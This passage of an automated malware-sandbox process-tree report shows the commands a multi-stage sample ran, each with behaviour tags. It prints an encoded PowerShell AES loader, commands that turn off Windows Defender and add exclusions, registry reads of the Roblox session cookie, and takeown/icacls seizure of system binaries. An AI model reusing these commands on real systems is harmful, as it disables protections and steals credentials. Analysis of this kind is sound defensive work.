                                                                                                                                        powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYnBioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAIAAkACgGSgYnBkYGJwYqBi4ATABlAG4AZwB0AGgAKQAKAAkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAAoBkoGJwZGBicGKgZfAEUGQQZDBkgGQwYpBl8AJwZEBioGNAZBBkoGMQYKAH0ACgAKACQARQZBBioGJwYtBiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEQAOAAsACAAMAB4ADIARgAsACAAMAB4ADEARgAsACAAMAB4ADYAQwAsACAAMAB4ADQARQAsACAAMAB4ADgAOAAsACAAMAB4ADQANQAsACAAMAB4AEQARAAsACAAMAB4ADEAQQAsACAAMAB4AEUARAAsACAAMAB4ADUAQwAsACAAMAB4ADQAQgAsACAAMAB4ADQAOQAsACAAMAB4ADQAOQAsACAAMAB4ADAAQwAsACAAMAB4ADMAQgAsACAAMAB4AEYAQQAsACAAMAB4AEEAMQAsACAAMAB4ADIANwAsACAAMAB4ADMARAAsACAAMAB4ADIAQQAsACAAMAB4AEIANQAsACAAMAB4AEMARAAsACAAMAB4ADIANwAsACAAMAB4ADQARAAsACAAMAB4ADAAQQAsACAAMAB4ADUAOQAsACAAMAB4ADUANwAsACAAMAB4AEMAQQAsACAAMAB4ADcAMAAsACAAMAB4AEEAQQAsACAAMAB4AEMAQgApAAoAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAxAEMALAAgADAAeABBADMALAAgADAAeAAzADQALAAgADAAeABBADYALAAgADAAeAA4ADQALAAgADAAeABDAEMALAAgADAAeABBAEEALAAgADAAeABEADIALAAgADAAeABCADAALAAgADAAeABFAEUALAAgADAAeABBAEMALAAgADAAeABEADcALAAgADAAeABFAEIALAAgADAAeABGAEUALAAgADAAeAA4AEYALAAgADAAeAA5ADkAKQAKAAoAaQBmACAAKAAkAEUGRAZBBl8AIwYuBkoGMQYgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGIAA9ACAAJABFBkQGQQZfACMGLgZKBjEGLgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAKAYnBkoGKgYnBioGXwBFBjQGQQYxBikGIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGKQA7AAoAIAAgACAAIAAkAEUGLQYqBkgGSQZfAEUGQQZDBkgGQwZfACcGRAYqBjQGQQZKBjEGIAA9ACAAQQZDBl8AJwZEBioGNAZBBkoGMQYgAC0ARQZBBioGJwYtBiAAJABFBkEGKgYnBi0GIAAtAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiAAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAC0AKAZKBicGRgYnBioGIAAkACgGJwZKBioGJwYqBl8ARQY0BkEGMQYpBgoACgAgACAAIAAgACQAKgYsBkUGSgY5BiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQARQYtBioGSAZJBl8ARQZBBkMGSAZDBl8AJwZEBioGNAZBBkoGMQYpACkAOwAKACAAIAAgACAAJABGBkIGNwYpBl8AJwZEBi8GLgZIBkQGIAA9ACAAJAAqBiwGRQZKBjkGLgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQARgZCBjcGKQZfACcGRAYvBi4GSAZEBi4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA
                                                                                                                                        4⤵
                                                                                                                                        • UAC bypass
                                                                                                                                        • Windows security bypass
                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:5852
                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\the.exe" -Force
                                                                                                                                          5⤵
                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:5428
                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                                                                                                                                          5⤵
                                                                                                                                          • Drops startup file
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:5868
                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                                                                                                                                          5⤵
                                                                                                                                            PID:1760
                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                        taskkill /f /im taskmgr.exe
                                                                                                                                        3⤵
                                                                                                                                        • Kills process with taskkill
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:5208
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\wimloader.dll
                                                                                                                                        wimloader.dll
                                                                                                                                        3⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:5540
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wimloader_80162a32-5549-40e3-8069-a33cbbf04b03\caller.cmd" "
                                                                                                                                          4⤵
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          PID:2988
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\ac3.exe
                                                                                                                                        ac3.exe
                                                                                                                                        3⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                        PID:1960
                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                        ping trustsentry.com -t -n 1 -s 4 -4
                                                                                                                                        3⤵
                                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                        • Runs ping.exe
                                                                                                                                        PID:6064
                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                        ping ya.ru -t -n 1 -s 4 -4
                                                                                                                                        3⤵
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                        • Runs ping.exe
                                                                                                                                        PID:1420
                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                        ping tria.ge -t -n 1 -s 4 -4
                                                                                                                                        3⤵
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                        • Runs ping.exe
                                                                                                                                        PID:5504
                                                                                                                                      • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                        xcopy bloatware C:\Users\Admin\Desktop
                                                                                                                                        3⤵
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        • Enumerates system info in registry
                                                                                                                                        PID:5988
                                                                                                                                      • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                        xcopy beastify.url C:\Users\Admin\Desktop
                                                                                                                                        3⤵
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        • Enumerates system info in registry
                                                                                                                                        PID:868
                                                                                                                                      • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                        xcopy shell1.ps1 C:\Users\Admin\Desktop
                                                                                                                                        3⤵
                                                                                                                                        • Enumerates system info in registry
                                                                                                                                        PID:5820
                                                                                                                                      • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                        takeown /R /F C:\Windows\explorer.exe
                                                                                                                                        3⤵
                                                                                                                                        • Possible privilege escalation attempt
                                                                                                                                        • Modifies file permissions
                                                                                                                                        PID:4848
                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                        icacls c:\Windows\explorer.exe /grant Admin:(F)
                                                                                                                                        3⤵
                                                                                                                                        • Possible privilege escalation attempt
                                                                                                                                        • Modifies file permissions
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:4224
                                                                                                                                      • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                        takeown /R /F C:\Windows\System32\dwm.exe
                                                                                                                                        3⤵
                                                                                                                                        • Possible privilege escalation attempt
                                                                                                                                        • Modifies file permissions
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:3476
                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                        icacls c:\Windows\System32\dwm.exe /grant Admin:(F)
                                                                                                                                        3⤵
                                                                                                                                        • Possible privilege escalation attempt
                                                                                                                                        • Modifies file permissions
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:1732
                                                                                                                                      • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                        xcopy xcer.cer C:\Users\Admin\Desktop
                                                                                                                                        3⤵
                                                                                                                                        • Enumerates system info in registry
                                                                                                                                        PID:5872
                                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                        timeout /t 15
                                                                                                                                        3⤵
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                        PID:6072
                                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                        timeout /t 15
                                                                                                                                        3⤵
                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                        PID:4848
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\freebobux.exe
                                                                                                                                        freebobux.exe
                                                                                                                                        3⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:5732
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3E67.tmp\freebobux.bat""
                                                                                                                                          4⤵
                                                                                                                                            PID:784
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\3E67.tmp\CLWCP.exe
                                                                                                                                              clwcp c:\temp\bg.bmp
                                                                                                                                              5⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Sets desktop wallpaper using registry
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              PID:1732
                                                                                                                                            • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3E67.tmp\x.vbs"
                                                                                                                                              5⤵
                                                                                                                                                PID:5768
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\SolaraBootstraper.exe
                                                                                                                                            SolaraBootstraper.exe
                                                                                                                                            3⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:5996
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
                                                                                                                                              4⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:5480
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Umbral.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
                                                                                                                                              4⤵
                                                                                                                                              • Drops file in Drivers directory
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:2864
                                                                                                                                              • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                "wmic.exe" csproduct get uuid
                                                                                                                                                5⤵
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:5628
                                                                                                                                              • C:\Windows\SYSTEM32\attrib.exe
                                                                                                                                                "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
                                                                                                                                                5⤵
                                                                                                                                                • Views/modifies file attributes
                                                                                                                                                PID:5820
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
                                                                                                                                                5⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                PID:2324
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                                                                                                                5⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                PID:4584
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                5⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                PID:2728
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                5⤵
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                PID:3544
                                                                                                                                              • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                "wmic.exe" os get Caption
                                                                                                                                                5⤵
                                                                                                                                                  PID:6448
                                                                                                                                                • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                  "wmic.exe" computersystem get totalphysicalmemory
                                                                                                                                                  5⤵
                                                                                                                                                    PID:6512
                                                                                                                                                  • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                    "wmic.exe" csproduct get uuid
                                                                                                                                                    5⤵
                                                                                                                                                      PID:6568
                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                      5⤵
                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                      PID:6632
                                                                                                                                                    • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                      "wmic" path win32_VideoController get name
                                                                                                                                                      5⤵
                                                                                                                                                      • Detects videocard installed
                                                                                                                                                      PID:6784
                                                                                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                      "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
                                                                                                                                                      5⤵
                                                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                      PID:6876
                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                        ping localhost
                                                                                                                                                        6⤵
                                                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                        • Runs ping.exe
                                                                                                                                                        PID:6936
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe"
                                                                                                                                                    4⤵
                                                                                                                                                    • Drops startup file
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                    PID:3548
                                                                                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                      netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe" "!FIXInj.exe" ENABLE
                                                                                                                                                      5⤵
                                                                                                                                                      • Modifies Windows Firewall
                                                                                                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:800
                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                  taskkill /f /im ctfmon.exe
                                                                                                                                                  3⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                  PID:4132
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\wim.dll
                                                                                                                                                  wim.dll
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:1068
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wim_bde80860-8708-4b36-a929-dad454ff8ce3\load.cmd" "
                                                                                                                                                    4⤵
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    • Modifies registry class
                                                                                                                                                    PID:3228
                                                                                                                                                    • C:\Program Files\VideoLAN\VLC\vlc.exe
                                                                                                                                                      "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\wim_bde80860-8708-4b36-a929-dad454ff8ce3\cringe.mp4"
                                                                                                                                                      5⤵
                                                                                                                                                      • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                                      • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                      PID:3308
                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\web2.htm
                                                                                                                                                  3⤵
                                                                                                                                                    PID:5492
                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffda2423cb8,0x7ffda2423cc8,0x7ffda2423cd8
                                                                                                                                                      4⤵
                                                                                                                                                        PID:5736
                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                      "C:\Windows\system32\rundll32.exe" cryptext.dll,CryptExtOpenCER C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\xcer.cer
                                                                                                                                                      3⤵
                                                                                                                                                      • Blocklisted process makes network request
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                      • Modifies system certificate store
                                                                                                                                                      PID:5660
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\f3cb220f1aaa32ca310586e5f62dcab1.exe
                                                                                                                                                      f3cb220f1aaa32ca310586e5f62dcab1.exe
                                                                                                                                                      3⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                      PID:6392
                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/account
                                                                                                                                                        4⤵
                                                                                                                                                          PID:3776
                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffda2423cb8,0x7ffda2423cc8,0x7ffda2423cd8
                                                                                                                                                            5⤵
                                                                                                                                                              PID:6196
                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/video
                                                                                                                                                            4⤵
                                                                                                                                                              PID:5600
                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffda2423cb8,0x7ffda2423cc8,0x7ffda2423cd8
                                                                                                                                                                5⤵
                                                                                                                                                                  PID:6460
                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:6552
                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffda2423cb8,0x7ffda2423cc8,0x7ffda2423cd8
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:6524
                                                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                  timeout /t 15
                                                                                                                                                                  3⤵
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                  PID:6256
                                                                                                                                                                • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                  xcopy C:\Windows\System32\WinMetadata C:\Users\Admin\Desktop
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                  PID:6160
                                                                                                                                                                • C:\Windows\SysWOW64\regedit.exe
                                                                                                                                                                  regedit
                                                                                                                                                                  3⤵
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  • Runs regedit.exe
                                                                                                                                                                  • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                  PID:6192
                                                                                                                                                                • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                  xcopy C:\Windows\WinSxS C:\Users\Admin\Desktop
                                                                                                                                                                  3⤵
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                  PID:6928
                                                                                                                                                                • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                  xcopy regmess.exe C:\Users\Admin\Desktop
                                                                                                                                                                  3⤵
                                                                                                                                                                  • System Location Discovery: System Language Discovery
